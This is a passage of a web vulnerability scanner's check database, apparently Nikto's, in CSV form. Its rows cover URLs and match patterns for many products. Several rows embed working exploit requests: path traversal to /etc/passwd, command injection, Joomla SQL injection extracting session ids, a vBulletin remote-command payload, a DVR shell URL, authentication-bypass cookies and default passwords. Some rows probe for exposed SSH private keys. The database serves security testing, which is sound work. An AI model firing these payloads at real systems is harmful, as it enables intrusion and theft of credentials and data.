Compatibility.\",\"\",\"\"\n\"007034\",\"0\",\"be\",\"/echo\",\"GET\",\"FastCGI\\sEcho\",\"\",\"\",\"\",\"\",\"Lansa aXes echo page found.\",\"\",\"\"\n\"007035\",\"0\",\"b\",\"/cgi-bin/lansaweb?about\",\"GET\",\"LANSA\\sfor\\sthe\\sWeb\",\"\",\"\",\"\",\"\",\"Lansa for the Web main CGI found.\",\"\",\"\"\n\"007036\",\"3092\",\"b\",\"@PHPMYADMINdoc/html/index.html\",\"GET\",\"phpMyAdmin.*Documentation\",\"\",\"200\",\"\",\"\",\"phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.\",\"\",\"\"\n\"007037\",\"3092\",\"b\",\"@PHPMYADMINdocs/html/index.html\",\"GET\",\"phpMyAdmin.*Documentation\",\"\",\"200\",\"\",\"\",\"phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.\",\"\",\"\"\n\"007038\",\"0\",\"3\",\"/mod_gzip_status\",\"GET\",\"mod_gzip_version\",\"mod_gzip_on\",\"200\",\"\",\"\",\"The mod_gzip_status page may reveal the version of mod_gzip running on this host.\",\"\",\"\"\n\"007039\",\"0\",\"7\",\"/courier/intermediate_login.html\",\"GET\",\"root:0\",\"\",\"\",\"\",\"\",\"Accellion allows LFI via the statecode cookie. See https://community.rapid7.com/community/metasploit/blog/2015/07/10/r7-2015-08-accellion-file-transfer-appliance-vulnerabilities-cve-2015-2856-cve-2015-2857\",\"\",\"Cookie: statecode=../../../../../../../../../etc/passwd%00\"\n\"007040\",\"0\",\"8\",\"/tws/getStatus\",\"POST\",\"\\\"result_msg\\\":\\\"Success\\\"\",\"\",\"\",\"\",\"\",\"Accellion allows RCE oath_token. See https://community.rapid7.com/community/metasploit/blog/2015/07/10/r7-2015-08-accellion-file-transfer-appliance-vulnerabilities-cve-2015-2856-cve-2015-2857\",\"transaction_id=1&oauth_token='%3becho '\",\"\"\n\"007041\",\"0\",\"3\",\"/rails/info/properties/\",\"GET\",\">(Ruby|Rails)\\sversion<\",\"<title>Routes<\\/title>\",\"200\",\"\",\"\",\"The Ruby on Rails status page may reveal the version of RoR and further details on this host.\",\"\",\"\"\n\"007042\",\"0\",\"3\",\"/rails/info/routes/\",\"GET\",\"<title>Routes</title>\",\"\",\"200\",\"\",\"\",\"The Ruby on Rails routes page may reveal all available routes on this host.\",\"\",\"\"\n\"007043\",\"0\",\"d\",\"/wps/wsdl\",\"GET\",\"wsdl:definitions\",\"\",\"\",\"\",\"\",\"IBM Websphere web services found.\",\"\",\"\"\n\"007044\",\"0\",\"1e\",\"/wps/portal/Home/Welcome/!ut/\",\"GET\",\"Sign\\sUp\",\"\",\"\",\"\",\"\",\"IBM Websphere default portal found. May allow users to create accounts.\",\"\",\"\"\n\"007045\",\"118103\",\"5\",\"@MAGMIweb/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"MAGMI allows any file to be retrieved remotely (CVE-2015-2067).\",\"\",\"\"\n\"007046\",\"0\",\"5\",\"@MAGMIweb/download_file.php?file=../../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"MAGMI allows any file to be retrieved remotely.\",\"\",\"\"\n\"007047\",\"0\",\"5\",\"@MAGMIweb/download_file.php?file=../../app/etc/local.xml\",\"GET\",\"<username>.*<\\/username>\",\"\",\"<password>.*<\\/password>\",\"\",\"\",\"MAGMI allows any file to be retrieved remotely.\",\"\",\"\"\n\"007048\",\"0\",\"be\",\"@MAGMIweb/magmi.php\",\"GET\",\"<link rel=\\\"stylesheet\\\" href=\\\"css\\/magmi\\.css\\\"><\\/link>\",\"\",\"\",\"\",\"\",\"MAGMI Administration interface found.\",\"\",\"\"\n\"007049\",\"0\",\"123b\",\"@MAGMIReleaseNotes.txt\",\"GET\",\"RELEASE NOTES FOR MAGMI\",\"\",\"\",\"\",\"\",\"MAGMI Release Notes identified.\",\"\",\"\"\n\"007050\",\"0\",\"be\",\"@HYBRIS\",\"GET\",\"[H|h]ybris\",\"\",\"[M|m]anagement\\s[C|c]onsole\",\"\",\"\",\"SAP Hybris Management Console found. Default credentials are admin:nimda\",\"\",\"\"\n\"007051\",\"0\",\"be\",\"@HYBRISlogin.jsp\",\"GET\",\"[H|h]ybris\",\"\",\"[A|a]dministration\\s[C|c]onsole\",\"\",\"\",\"SAP Hybris Administration Console found. Default credentials are admin:nimda\",\"\",\"\"\n\"007052\",\"0\",\"23\",\"/cfg/CFGConnectionParams.txt\",\"GET\",\"user=\",\"\",\"\",\"\",\"\",\"Caremark Carestream config file found. May include account information and host data.\",\"\",\"\"\n\"007053\",\"0\",\"23\",\"/serverVars.js\",\"GET\",\"SERVER_IPADDRESS\",\"\",\"\",\"\",\"\",\"Caremark Carestream JavaScript config file found. May include host information..\",\"\",\"\"\n\"007054\",\"0\",\"9\",\"/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select%201%20FROM(select%20count(*),concat((select%20(select%20concat(session_id))%20FROM%20jml_session%20LIMIT%200,1),floor(rand(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)\",\"GET\",\"Duplicate\\sEntry\",\"Subquery\",\"\",\"\",\"\",\"Joomla is vulnerable to a SQL injection which can lead to administrator access. https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/?page=1&year=0&month=0\",\"\",\"\"\n\"007055\",\"0\",\"3b\",\"/azenv.php\",\"GET\",\"HTTP_CONNECTION\",\"\",\"\",\"\",\"\",\"This program is a proxy test script which echoes environment variables.\",\"\",\"\"\n\"007056\",\"0\",\"be\",\"@PIWIKindex.php\",\"GET\",\"<title>.*[Pp]iwik.*</title>\",\"http://piwik\\.org\",\"200\",\"\",\"\",\"Piwik Analytics login found.\",\"\",\"\"\n\"007057\",\"0\",\"123b\",\"@PIWIKCHANGELOG.md\",\"GET\",\"## Piwik ([0-9.]+)\",\"\",\"200\",\"\",\"\",\"Piwik Analytics Changelog identified.\",\"\",\"\"\n\"007058\",\"0\",\"8\",\"@VBULLETINajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A25%3A%22system%28%27cat%20%2Fetc%2Fpasswd%27%29%22%3B%7D\",\"GET\",\"root:0\",\"\",\"\",\"\",\"\",\"vBulletin 5 contains a remote command execution see CVE-2015-7808, http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/.\",\"\",\"\"\n\"007059\",\"0\",\"3\",\"/GulpFile.js\",\"GET\",\"var\\sgulp\",\"\",\"\",\"\",\"\",\"GulpFile.js build config may reveal sensitive information.\",\"\",\"\"\n\"007060\",\"0\",\"3\",\"/admin/views/ajax/autocomplete/user/a\",\"GET\",\"\\\"admin\\\":\",\"\",\"\",\"\",\"\",\"Drupal Views module discloses user names, including the administrator. http://www.madirish.net/node/465.\",\"\",\"\"\n\"007061\",\"0\",\"e\",\"/en/setup\",\"GET\",\"401\",\"\",\"\",\"\",\"\",\"Silex USB-device has a default credential root: (empty password) set.\",\"\",\"\"\n\"007062\",\"0\",\"e\",\"/page.cmd\",\"POST\",\"(IP configuration|Subnet mask|Default route|Primary DNS)\",\"\",\"\",\"\",\"\",\"Unify/Siemens OpenStage SIP has a default password 123456 set.\",\"page_submit=WEBMp_Admin_Login&page-next=WEBM_Admin_IpConfiguration&AdminPassword=123456\",\"\"\n\"007063\",\"0\",\"e\",\"/page.cmd\",\"POST\",\"(IP configuration|Subnet mask|Default route|Primary DNS)\",\"\",\"\",\"\",\"\",\"Unify/Siemens OpenStage SIP has a default password 123456 set.\",\"page_submit=WEBMp_AdminLogin&page-next=WEBM_Admin_IpConfiguration&WEBMv-Admin-Password=123456\",\"\"\n\"007064\",\"0\",\"e\",\"/page.cmd\",\"POST\",\"(IP configuration|Subnet mask|Default route|Primary DNS)\",\"\",\"\",\"\",\"\",\"Unify/Siemens OpenStage SIP has a default password 123456 set.\",\"page_submit=WEBMp_AdminLogin&page-next=WEBM_Admin_IpConfiguration&AdminPassword=123456\",\"\"\n\"007065\",\"0\",\"e\",\"/authorize\",\"POST\",\"Access Granted\\. This IP Address now has admin\",\"access to the restricted printer pages\\.\",\"\",\"\",\"\",\"Zebra PrintServer Webinterface has a default password 1234 set.\",\"0=1234\",\"\"\n\"007066\",\"0\",\"eb\",\"/sitecore/login\",\"GET\",\"Sitecore\\.NET\",\"\",\"\",\"\",\"\",\"Sitecore CMS login found.\",\"\",\"\"\n\"007067\",\"0\",\"eb\",\"/sitecore/admin/login.aspx?returnUrl=/\",\"GET\",\"into\\sSitecore\",\"\",\"\",\"\",\"\",\"Sitecore CMS admin login found.\",\"\",\"\"\n\"007068\",\"0\",\"b\",\"/admin/sites/new\",\"GET\",\"401\",\"\",\"\",\"\",\"\",\"ComfortableMexicanSofa CMS Engine Admin Backend (pass protected)\",\"\",\"\"\n\"007069\",\"0\",\"b\",\"/cms-admin/sites/new\",\"GET\",\"401\",\"\",\"\",\"\",\"\",\"ComfortableMexicanSofa CMS Engine Admin Backend (pass protected)\",\"\",\"\"\n\"007070\",\"0\",\"be\",\"/struts/webconsole.html\",\"GET\",\"wc-command\",\"\",\"\",\"\",\"\",\"Struts debugging is enabled and OGNL console is available.\",\"\",\"\"\n\"007071\",\"0\",\"3b\",\"/owa/auth/logon.aspx\",\"GET\",\"<title>Outlook Web App<\\/title>\",\"(/owa/([0-9.]+)/themes/|/owa/auth/([0-9.]+)/themes/)\",\"\",\"\",\"\",\"Outlook Web App identified. OWA is exposing its version within the themes path like /owa/auth/15.0.995/themes.\",\"\",\"\"\n\"007072\",\"0\",\"be\",\"/system/console/configMgr\",\"GET\",\"401\",\"\",\"\",\"\",\"\",\"Adobe Experience Manager OSGi console.\",\"\",\"\"\n\"007073\",\"0\",\"be\",\"/system/console/bundles\",\"GET\",\"401\",\"\",\"\",\"\",\"\",\"Adobe Experience Manager OSGi console found.\",\"\",\"\"\n\"007074\",\"0\",\"be\",\"/system/sling/cqform/defaultlogin.html\",\"GET\",\"QUICKSTART_HOMEPAGE\",\"\",\"\",\"\",\"\",\"Adobe Experience Manager Sling console.\",\"\",\"\"\n\"007075\",\"0\",\"be\",\"/crx/de/index.jsp\",\"GET\",\"crxde_favicon\\.ico\",\"\",\"\",\"\",\"\",\"Adobe Experience Manager CRXDE console.\",\"\",\"\"\n\"007076\",\"0\",\"be\",\"/libs/cq/core/content/login.html\",\"GET\",\"CQ5 - Sign In\",\"\",\"\",\"\",\"\",\"Adobe Experience Manager CQ5 admin login.\",\"\",\"\"\n\"007077\",\"0\",\"5\",\"/scgi-bin/platform.cgi\",\"POST\",\"root:\",\"loic_ipsec:\",\"\",\"\",\"\",\"Devices with Cisco http firewall are prone to a local file inclusion. See: https://www.exploit-db.com/exploits/39184/\",\"button.login.home=Se%20connecter&Login.userAgent=0x4148_Fu&reload=0&SSLVPNUser.Password=0x4148Fu&SSLVPNUser.UserName=0x4148&thispage=../../../../../../etc/passwd%00\",\"\"\n\"007078\",\"0\",\"3\",\"@PAGESPEED\",\"GET\",\"<b>Pagespeed\\sAdmin<\\/b>\",\"\",\"\",\"\",\"\",\"This reveals information about the running Pagespeed Module (mod_pagespeed/ngx_pagespeed). Comment out appropriate line in the webservers conf file or restrict access to allowed sources.\",\"\",\"\"\n\"007079\",\"0\",\"4\",\"@MAGENTOskin/adminhtml/default/default/media/editor.swf\",\"GET\",\"@MD5259afd515d7b2edee76f67973fea95a6\",\"\",\"\",\"\",\"\",\"Several Adobe Flash files that ship with Magento are vulnerable to DOM based Cross Site Scripting (XSS). See http://appcheck-ng.com/unpatched-vulnerabilites-in-magento-e-commerce-platform/\",\"\",\"\"\n\"007080\",\"0\",\"4\",\"@MAGENTOskin/adminhtml/default/default/media/uploader.swf\",\"GET\",\"@MD51c300001dadd932ef6e33a2fadf941e1\",\"\",\"\",\"\",\"\",\"Several Adobe Flash files that ship with Magento are vulnerable to DOM based Cross Site Scripting (XSS). See http://appcheck-ng.com/unpatched-vulnerabilites-in-magento-e-commerce-platform/\",\"\",\"\"\n\"007081\",\"0\",\"4\",\"@MAGENTOskin/adminhtml/default/default/media/uploaderSingle.swf\",\"GET\",\"@MD5304dd960698c5786dcd64b0e138f80ca\",\"\",\"\",\"\",\"\",\"Several Adobe Flash files that ship with Magento are vulnerable to DOM based Cross Site Scripting (XSS). See http://appcheck-ng.com/unpatched-vulnerabilites-in-magento-e-commerce-platform/\",\"\",\"\"\n\"007082\",\"0\",\"23\",\"/.MySCMServerInfo\",\"GET\",\"SCMBranch\",\"\",\"\",\"\",\"\",\"Surround SCM file reveals a list of files in source control.\",\"\",\"\"\n\"007083\",\"0\",\"23\",\"/_diagnostic.jsp\",\"GET\",\"WebDX\\sSC\",\"\",\"\",\"\",\"\",\"GE Centricity PACS WebDX diagnostics page reveals detailed application and system information.\",\"\",\"\"\n\"007084\",\"0\",\"8\",\"/shell?cat%20/etc/passwd\",\"GET\",\"root:.*:0:[01]:\",\"\",\"\",\"\",\"\",\"Multiple DVR devices are prone to a remote command execution. See https://www.pentestpartners.com/blog/pwning-cctv-cameras/\",\"\",\"\"\n\"007085\",\"0\",\"ae\",\"/view2.html\",\"GET\",\"<span\\slxc_lang=\\\"view_Channel\\\">Channel<\\/span>\",\"<a\\sid=\\\"connectAll\\\"\\slxc_lang=\\\"view_Connect_all\\\">\",\"200\",\"\",\"\",\"Multiple DVR devices are prone to an authentication bypass. See https://www.pentestpartners.com/blog/pwning-cctv-cameras/\",\"\",\"Cookie: dvr_camcnt=24; dvr_usr=null; dvr_pwd=null\"\n\"007086\",\"0\",\"ae\",\"/main.html\",\"GET\",\"<span\\slxc_lang=\\\"view_Channel\\\">Channel<\\/span>\",\"<a\\sid=\\\"connectAll\\\"\\slxc_lang=\\\"view_Connect_all\\\">\",\"200\",\"\",\"\",\"Multiple DVR devices are prone to an authentication bypass. See https://www.pentestpartners.com/blog/pwning-cctv-cameras/\",\"\",\"Cookie: dvr_camcnt=24; dvr_usr=null; dvr_pwd=null\"\n\"007087\",\"0\",\"b\",\"@SYMPHONYREADME.markdown\",\"GET\",\"http:\\/\\/getsymphony\\.com\",\"\",\"200\",\"\",\"\",\"Symphony CMS README file found containing the version of the CMS.\",\"\",\"\"\n\"007088\",\"0\",\"b\",\"@SYMPHONYREADME\",\"GET\",\"Symphony\\s([0-9.]+)\",\"\",\"200\",\"\",\"\",\"Symphony CMS README file found containing the version of the CMS.\",\"\",\"\"\n\"007089\",\"0\",\"3b\",\"@AXIS2services/Version?method=getVersion\",\"GET\",\"Apache\\sAxis\\sversion\",\"The\\sAXIS\\sengine\\scould\\snot\\sfind\\sa\\starget\\sservice\\sto\\sinvoke!\",\"\",\"\",\"\",\"Apache Axis identified. This URL might also expose the running version of Axis.\",\"\",\"\"\n\"007090\",\"0\",\"3b\",\"@CKEDITORckeditor.js\",\"GET\",\"CKSource\",\"\",\"CKEDITOR\",\"\",\"\",\"CKEditor identified. This file might also expose the version of CKEditor.\",\"\",\"\"\n\"007091\",\"0\",\"3b\",\"@CKEDITORCHANGES.md\",\"GET\",\"CKEditor\",\"\",\"Changelog\",\"\",\"\",\"CKEditor Changelog identified.\",\"\",\"\"\n\"007092\",\"0\",\"4\",\"@CKEDITORsamples/sample_posteddata.php\",\"POST\",\"<script>alert\\('XSS'\\)</script>\",\"\",\"ckeditor.com\",\"\",\"\",\"CKEditor 4.0.1 and below is vulnerable to a Cross-Site Scripting (XSS) vulnerability.\",\"<script>alert('XSS')</script>[]=PATH DISCLOSURE\",\"\"\n\"007093\",\"0\",\"3\",\"/app/plugins/php_plugin/phpinfo.php\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"Android PAW Server PHP plugin phpinfo.php script reveals system information.\",\"\",\"\"\n\"007094\",\"0\",\"2\",\"/composer.json\",\"GET\",\"\\\"(require|name)\\\":\\s\",\"\",\"\",\"\",\"\",\"PHP Composer configuration file reveals configuration information - https://getcomposer.org/\",\"\",\"\"\n\"007095\",\"0\",\"2\",\"/composer.lock\",\"GET\",\"(getcomposer\\.org|\\\"require\\\":\\s)\",\"\",\"\",\"\",\"\",\"PHP Composer configuration file reveals configuration information - https://getcomposer.org/\",\"\",\"\"\n\"007096\",\"0\",\"2\",\"/install.sql\",\"GET\",\"(CREATE TABLE|create table|INSERT INTO|insert into)\",\"\",\"\",\"\",\"\",\"Installation SQL file found.\",\"\",\"\"\n\"007097\",\"0\",\"2\",\"/setup.sql\",\"GET\",\"(CREATE TABLE|create table|INSERT INTO|insert into)\",\"\",\"\",\"\",\"\",\"Setup SQL file found.\",\"\",\"\"\n\"007098\",\"0\",\"1\",\"/.well-known/browserid\",\"GET\",\"public-key\",\"provisioning\",\"\",\"\",\"\",\"Mozilla Persona may leak additional URLs on the server.\",\"\",\"\"\n\"007099\",\"0\",\"1\",\"/.well-known/acme-challenge\",\"GET\",\"Index of \\/\",\"\",\"\",\"\",\"\",\"Letsencrypt.org key information may be available in this directory.\",\"\",\"\"\n\"007100\",\"0\",\"1\",\"/.well-known/ashrae\",\"GET\",\"bacnet\\.org\",\"\",\"\",\"\",\"\",\"ASHRAE file may contain server info, per RFC-5785. See http://www.bacnet.org/Addenda/Add-135-2012am-ppr3-draft-17_chair_approved.pdf.\",\"\",\"\"\n\"007101\",\"0\",\"1\",\"/.well-known/assetlinks.json\",\"GET\",\"namespace\\\"\",\"\",\"\",\"\",\"\",\"Google Asset Links Specification file may contain server info, per RFC-5785. See https://github.com/google/digitalassetlinks/blob/master/well-known/details.md\",\"\",\"\"\n\"007102\",\"0\",\"1\",\"/.well-known/caldav\",\"GET\",\"current-user-principal\",\"\",\"\",\"\",\"\",\"CalDAV file may contain server info, per RFC-5785. See http://tools.ietf.org/html/rfc6764\",\"\",\"\"\n\"007103\",\"0\",\"1\",\"/.well-known/carddav\",\"GET\",\"principal\",\"\",\"\",\"\",\"\",\"CardDAV file may contain server info, per RFC-5785. See http://tools.ietf.org/html/rfc6764\",\"\",\"\"\n\"007104\",\"3093\",\"23\",\"@TYPO3ChangeLog\",\"GET\",\"Release\\sof\\sTYPO3\",\"\",\"\",\"\",\"\",\"TYPO3 ChangeLog file found.\",\"\",\"\"\n\"007105\",\"0\",\"1\",\"/.well-known/core\",\"GET\",\">rt=\",\">if=\",\"\",\"\",\"\",\"core file may contain server info/links, per RFC-6690. See http://tools.ietf.org/html/rfc6690\",\"\",\"\"\n\"007106\",\"0\",\"1\",\"/.well-known/csvm\",\"GET\",\"csv-metadata\\.json\",\"csvm\\.json\",\"\",\"\",\"\",\"csvm file may contain server links. See https://www.w3.org/TR/2015/CR-tabular-data-model-20150716/\",\"\",\"\"\n\"007107\",\"3092\",\"b\",\"@PHPMYADMINREADME\",\"GET\",\"phpMyAdmin\\s-\\sReadme\",\"\",\"200\",\"\",\"\",\"phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.\",\"\",\"\"\n\"007108\",\"0\",\"23\",\"/v1/credentials\",\"GET\",\"secretValue:\\s\\\"\",\"\",\"\",\"\",\"\",\"Rancher Docker manager appears to be available without authentication. It has built in remote shell functionality. Have fun.\",\"\",\"\"\n\"007109\",\"0\",\"1\",\"/web.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"007110\",\"0\",\"d\",\"@AXIS2services/AdminService?wsdl\",\"GET\",\"AdminServiceResponse\",\"AdminServiceRequest\",\"\",\"\",\"\",\"Apache Axis AdminService identified.\",\"\",\"\"\n\"007111\",\"0\",\"e\",\"@AXIS2servlet/AdminServlet\",\"GET\",\"<title>Axis<\\/title>\",\"Server\\sis\\srunning\",\"\",\"\",\"\",\"Apache Axis AdminServlet identified.\",\"\",\"\"\n\"007112\",\"0\",\"23\",\"@AXIS2SOAPMonitor\",\"GET\",\"SOAPMonitorApplet\\.class\",\"\",\"\",\"\",\"\",\"Apache Axis SOAPMonitor identified.\",\"\",\"\"\n\"007113\",\"0\",\"d\",\"@AXIS2EchoHeaders.jws?method=list\",\"GET\",\"<soapenv:Envelope\",\"\",\"\",\"\",\"\",\"Apache Axis EchoHeaders default webservice.\",\"\",\"\"\n\"007114\",\"0\",\"b\",\"@AXIS2index.jsp\",\"GET\",\"Apache-AXIS<\\/h1>\",\"<title>Apache-Axis<\\/title>\",\"\",\"\",\"\",\"Apache Axis Web Application identified.\",\"\",\"\"\n\"007115\",\"0\",\"23\",\"@AXIS2servlet/AxisServlet\",\"GET\",\"And now\\.\\.\\.\\sSome\\sServices\",\"\",\"\",\"\",\"\",\"Apache Axis web services reveals information about all installed web services. See http://ws.apache.org/axis/java/security.html to secure Axis.\",\"\",\"\"\n\"007116\",\"0\",\"be\",\"/workarea/login.aspx\",\"GET\",\"ektron\\.javascript\",\"\",\"\",\"\",\"\",\"Ektron CMS administrative interface found.\",\"\",\"\"\n\"007119\",\"0\",\"3\",\"/core/modules/config/config.info.yml\",\"GET\",\"version:\",\"\",\"\",\"\",\"\",\"Drupal version number revealed in config.info.yml\",\"\",\"\"\n\"007120\",\"0\",\"3\",\"/core/CHANGELOG.txt\",\"GET\",\"Drupal\\s\",\"\",\"\",\"\",\"\",\"Drupal version number revealed in CHANGELOG.txt\",\"\",\"\"\n\"007121\",\"3093\",\"3\",\"/.ssh/id_rsa\",\"GET\",\"^-----((BEGIN|END)\\sRSA\\sPRIVATE\\sKEY|(BEGIN|END)\\sENCRYPTED\\sPRIVATE\\sKEY|(BEGIN|END)\\sOPENSSH\\sPRIVATE\\sKEY)-----\",\"\",\"200\",\"\",\"\",\"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.\",\"\",\"\"\n\"007122\",\"3093\",\"3\",\"/.ssh/id_rsa.pub\",\"GET\",\"^(ssh-rsa)\",\"\",\"200\",\"\",\"\",\"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.\",\"\",\"\"\n\"007123\",\"3093\",\"3\",\"/.ssh/id_dsa\",\"GET\",\"^-----((BEGIN|END)\\sDSA\\sPRIVATE\\sKEY|(BEGIN|END)\\sENCRYPTED\\sPRIVATE\\sKEY|(BEGIN|END)\\sOPENSSH\\sPRIVATE\\sKEY)-----\",\"\",\"200\",\"\",\"\",\"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.\",\"\",\"\"\n\"007124\",\"3093\",\"3\",\"/.ssh/id_dsa.pub\",\"GET\",\"^(ssh-dsa)\",\"\",\"200\",\"\",\"\",\"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.\",\"\",\"\"\n\"007125\",\"3093\",\"3\",\"/.ssh/id_dss\",\"GET\",\"^-----((BEGIN|END)\\sDSS\\sPRIVATE\\sKEY|(BEGIN|END)\\sENCRYPTED\\sPRIVATE\\sKEY|(BEGIN|END)\\sOPENSSH\\sPRIVATE\\sKEY)-----\",\"\",\"200\",\"\",\"\",\"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.\",\"\",\"\"\n\"007126\",\"3093\",\"3\",\"/.ssh/id_dss.pub\",\"GET\",\"^(ssh-dss)\",\"\",\"200\",\"\",\"\",\"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.\",\"\",\"\"\n\"007127\",\"0\",\"e\",\"/phpLiteAdmin/\",\"GET\",\"phpliteadmin\\.php\",\"\",\"\",\"\",\"\",\"phpLiteAdmin console found.\",\"\",\"\"\n\"007128\",\"0\",\"e\",\"/MAMP/phpLiteAdmin/\",\"GET\",\"phpliteadmin\\.php\",\"\",\"\",\"\",\"\",\"phpLiteAdmin console found.\",\"\",\"\"\n\"007129\",\"3092\",\"1\",\"/.sqlite_history\",\"GET\",\"^(tables|quit|databases|INSERT|insert|delete|DELETE|drop|DROP|grant|GRANT|select|SELECT)\",\"\",\"200\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"007130\",\"0\",\"9\",\"@FORUMforumrunner/request.php?cmd=get_spam_data&d=1&postids='1\",\"GET\",\"(database\\shas\\sencountered\\sa\\sproblem|/image\\.php\\?type=dberror)\",\"\",\"\",\"\",\"\",\"vBulletin contains a SQL injection in the forumrunner addon. See https://enumerated.wordpress.com/2016/07/11/1/\",\"\",\"\"\n\"007131\",\"0\",\"9\",\"@VBULLETINforumrunner/request.php?cmd=get_spam_data&d=1&postids='1\",\"GET\",\"(database\\shas\\sencountered\\sa\\sproblem|/image\\.php\\?type=dberror)\",\"\",\"\",\"\",\"\",\"vBulletin contains a SQL injection in the forumrunner addon. See https://enumerated.wordpress.com/2016/07/11/1/\",\"\",\"\"\n\"007132\",\"0\",\"b\",\"/sitecore/shell/webservice/service.asmx\",\"GET\",\"Visual Sitecore Service\",\"\",\"\",\"\",\"\",\"The SiteCore CMS shell webservice is running which could allow an attacker to brute force account information or execute API commands\",\"\",\"\"\n\"007133\",\"0\",\"b\",\"/sitecore/admin/login.aspx\",\"GET\",\"Log into Sitecore\",\"\",\"\",\"\",\"\",\"The SiteCore CMS administrative login interface is available which could allow brute force or unauthorized access\",\"\",\"\"\n\"007134\",\"0\",\"b\",\"/sitecore/debug\",\"GET\",\"Default page\",\"\",\"\",\"\",\"\",\"The SiteCore CMS debug interface was identified as accessible\",\"\",\"\"\n\"007135\",\"0\",\"b\",\"/loleaflet/dist/admin/admin.html\",\"GET\",\"401\",\"\",\"\",\"\",\"\",\"LibreOffice Online Admin interface found (pass protected)\",\"\",\"\"\n\"007136\",\"0\",\"b\",\"/dist/admin/admin.html\",\"GET\",\"401\",\"\",\"\",\"\",\"\",\"LibreOffice Online Admin interface found (pass protected)\",\"\",\"\"\n\"007137\",\"3093\",\"3\",\"/.ssh/id_ecdsa.pub\",\"GET\",\"^(ecdsa-sha2-nistp256)\",\"\",\"200\",\"\",\"\",\"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.\",\"\",\"\"\n\"007138\",\"3093\",\"3\",\"/.ssh/id_ecdsa\",\"GET\",\"^-----((BEGIN|END)\\sEC\\sPRIVATE\\sKEY|(BEGIN|END)\\sENCRYPTED\\sPRIVATE\\sKEY|(BEGIN|END)\\sOPENSSH\\sPRIVATE\\sKEY)-----\",\"\",\"200\",\"\",\"\",\"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.\",\"\",\"\"\n\"007139\",\"3093\",\"3\",\"/.ssh/id_ed25519.pub\",\"GET\",\"^(ssh-ed25519)\",\"\",\"200\",\"\",\"\",\"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.\",\"\",\"\"\n\"007140\",\"3093\",\"3\",\"/.ssh/id_ed25519\",\"GET\",\"^-----((BEGIN|END)\\sENCRYPTED\\sPRIVATE\\sKEY|(BEGIN|END)\\sOPENSSH\\sPRIVATE\\sKEY)-----\",\"\",\"200\",\"\",\"\",\"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.\",\"\",\"\"\n\"007141\",\"3093\",\"3\",\"/.ssh/identity\",\"GET\",\"^SSH PRIVATE KEY FILE FORMAT\",\"\",\"200\",\"\",\"\",\"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.\",\"\",\"\"\n\"007142\",\"0\",\"2\",\"/user_guide/\",\"GET\",\"CodeIgniter User Guide\",\"\",\"\",\"\",\"\",\"CodeIgniter User Guide exposes installed version number.\",\"\",\"\"\n\"007143\",\"0\",\"3\",\"/.idea/misc.xml\",\"GET\",\"ProjectRootManager\",\"\",\"\",\"\",\"\",\"JetBrains project IDE reveals application information.\",\"\",\"\"\n\"007144\",\"0\",\"3\",\"/.idea/modules.xml\",\"GET\",\"module\\sfileurl\",\"\",\"\",\"\",\"\",\"JetBrains project IDE reveals application information.\",\"\",\"\"\n\"007145\",\"0\",\"3\",\"/.idea/vcs.xml\",\"GET\",\"mapping\\sdirectory\",\"\",\"\",\"\",\"\",\"JetBrains project IDE reveals application information.\",\"\",\"\"\n\"007146\",\"0\",\"3\",\"/.idea/workspace.xml\",\"GET\",\"project\\sversion\",\"\",\"\",\"\",\"\",\"JetBrains project IDE reveals application information.\",\"\",\"\"\n\"007147\",\"0\",\"3\",\"/.idea/scopes/scope_settings.xml\",\"GET\",\"DependencyValidationManager\",\"\",\"\",\"\",\"\",\"JetBrains project IDE reveals application information.\",\"\",\"\"\n\"007148\",\"0\",\"9\",\"/portal/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW?p_arg_names=_max_levels&p_arg_values=1&p_arg_names=_start_with_field&p_arg_values=null&p_arg_names=_start_with_value&p_arg_values=:p_start_with_value%27\",\"GET\",\"Failed\\sto\\sparse\\squery\",\"\",\"\",\"\",\"\",\"Oracle Portal Demo Org Chart is vulnerable to SQL injection. See https://packetstormsecurity.com/files/123650/Oracle-Portal-Demo-Organization-Chart-PL-SQL-Injection.html\",\"\",\"\"\n\"007149\",\"0\",\"9\",\"/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW?p_arg_names=_max_levels&p_arg_values=1&p_arg_names=_start_with_field&p_arg_values=null&p_arg_names=_start_with_value&p_arg_values=:p_start_with_value%27\",\"GET\",\"Failed\\sto\\sparse\\squery\",\"\",\"\",\"\",\"\",\"Oracle Portal Demo Org Chart is vulnerable to SQL injection. See 